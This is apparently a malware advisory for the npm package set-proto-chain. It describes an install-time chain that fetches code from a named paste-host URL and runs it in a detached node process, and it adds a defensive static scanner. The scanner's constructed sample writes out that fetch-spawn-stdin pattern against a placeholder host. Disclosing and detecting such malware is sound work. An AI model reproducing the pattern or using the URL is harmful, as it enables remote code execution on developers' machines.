
MAL-2026-6079

Malicious code in set-proto-chain (npm)

Details


## Source: amazon-inspector (bdb11eef3afbfc268bd48a18737884246861c7ae9e6a3d29901ae1379216c633)

lib/index.js contains a base64-encoded URL (decoding to https://jsonkeeper.com/b/BN77K, an anonymous mutable paste host) that is fetched via axios.get; the response's `.data.cookie` field is then written to the stdin of a detached `node` child process for execution. The top-level index.js calls getThetaInterface() unconditionally, and package.json declares `postinstall: node index.js`, so the fetch-and-execute path fires automatically on `npm install` as well as on require(). The fetched payload is attacker-controlled and can change at any time. The package additionally impersonates the legitimate `proto-chain` package (README header `# proto-chain`, runtime error messages referencing `require('proto-chain')`), making accidental installs more likely.
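The advisory describes a recognisable install-time fetch-and-execute chain: a lifecycle hook, an obfuscated URL, an HTTP fetch, and a detached child process fed through stdin. The following static triage scan is an added example (not part of this advisory, OSV, or the set-proto-chain package) showing how a defender can surface that combination of indicators in a package before installing it. It takes a map of file name to contents, which in practice would come from an unpacked npm tarball; the helper names, the severity thresholds and the `example.invalid` placeholder host in the constructed sample are all assumptions, and the sample fragment is a non-functional stand-in for the shape described above, not the package's code.

```javascript
// Added example, not code from the advisory or from the set-proto-chain
// package. Static triage of an npm package for the install-time
// fetch-and-execute pattern: lifecycle hooks that run on `npm install`,
// base64 runs that decode to http(s) URLs, HTTP client calls, child_process
// spawning with `detached: true`, and writes to a child's stdin.
// Helper names and thresholds are assumptions; input is built inline.

const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];
const BASE64_RUN = /[A-Za-z0-9+/]{16,}={0,2}/g;

// Base64 runs that decode to a URL: the obfuscation noted in the advisory,
// which hides the remote host from a casual grep of the source.
function decodedUrls(source) {
  const hits = [];
  for (const run of source.match(BASE64_RUN) || []) {
    const text = Buffer.from(run, 'base64').toString('utf8');
    if (/^https?:\/\/[^\s'"<>]+$/.test(text)) hits.push({ encoded: run, url: text });
  }
  return hits;
}

// Lifecycle scripts run automatically during `npm install`, so any of these
// turns "code that runs on require()" into "code that runs on install".
function lifecycleHooks(pkgJsonText) {
  let pkg;
  try { pkg = JSON.parse(pkgJsonText); } catch { return []; }
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE.filter((k) => typeof scripts[k] === 'string')
    .map((k) => ({ hook: k, cmd: scripts[k] }));
}

// Per-file source indicators. Each is benign on its own; the combination
// (fetch + spawn + stdin write) is the fetch-and-execute signal.
function sourceIndicators(source) {
  return {
    httpClient: /\b(?:axios\.(?:get|post)|fetch|https?\.(?:get|request))\s*\(/.test(source),
    childProcess: /child_process/.test(source) && /\b(?:spawn|exec|execFile|fork)\s*\(/.test(source),
    detached: /\bdetached\s*:\s*true\b/.test(source),
    stdinWrite: /\.stdin\.write\s*\(/.test(source),
    encodedUrls: decodedUrls(source),
  };
}

// files: { 'package.json': text, 'index.js': text, ... }
function scanPackage(files) {
  const findings = [];
  const hooks = lifecycleHooks(files['package.json'] || '');
  for (const h of hooks) findings.push(`lifecycle hook ${h.hook}: ${h.cmd}`);
  let remoteExec = false;
  for (const [name, text] of Object.entries(files)) {
    if (!name.endsWith('.js')) continue;
    const ind = sourceIndicators(text);
    for (const u of ind.encodedUrls) findings.push(`${name}: base64-encoded URL ${u.url}`);
    if (ind.httpClient) findings.push(`${name}: HTTP client call`);
    if (ind.childProcess) findings.push(`${name}: child_process spawn/exec`);
    if (ind.detached) findings.push(`${name}: detached child process`);
    if (ind.stdinWrite) findings.push(`${name}: writes to a child's stdin`);
    if (ind.httpClient && ind.childProcess && ind.stdinWrite) remoteExec = true;
  }
  // Remote fetch-and-execute reachable from an install hook is the worst case.
  let verdict = 'clean';
  if (remoteExec) verdict = hooks.length ? 'critical' : 'high';
  else if (findings.length) verdict = 'review';
  return { verdict, findings };
}

// Constructed samples (assumptions): a non-functional fragment shaped like
// the advisory's description, using the placeholder host example.invalid,
// and a benign package for comparison.
const ENCODED = Buffer.from('https://example.invalid/paste').toString('base64');
const SUSPICIOUS = {
  'package.json': JSON.stringify({ name: 'sample-pkg', scripts: { postinstall: 'node index.js' } }),
  'index.js': [
    "const axios = require('axios');",
    "const { spawn } = require('child_process');",
    `const target = Buffer.from('${ENCODED}', 'base64').toString();`,
    "axios.get(target).then((r) => { const c = spawn('node', [], { detached: true }); c.stdin.write(r.data); });",
  ].join('\n'),
};
const BENIGN = {
  'package.json': JSON.stringify({ name: 'sample-lib', scripts: { test: 'node test.js' } }),
  'index.js': 'module.exports = (o, p) => Object.setPrototypeOf(o, p);',
};

console.log('suspicious:', JSON.stringify(scanPackage(SUSPICIOUS), null, 2));
console.log('benign:', JSON.stringify(scanPackage(BENIGN), null, 2));
```

The scan is deliberately conservative about what it calls a finding: an HTTP call or a child process alone only earns a `review` verdict, while the full chain of fetch, spawn and stdin write in one file is reported as `high`, and `critical` when a lifecycle hook makes it fire on `npm install`. Run it against the unpacked tarball of a package (`npm pack`, then read the files) rather than against an installed copy, so that the package's own hooks never execute during triage.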


Affected packages

npm / set-proto-chain

No fixed version published yet for set-proto-chain (npm). Pin to a known-safe version or switch to an alternative.
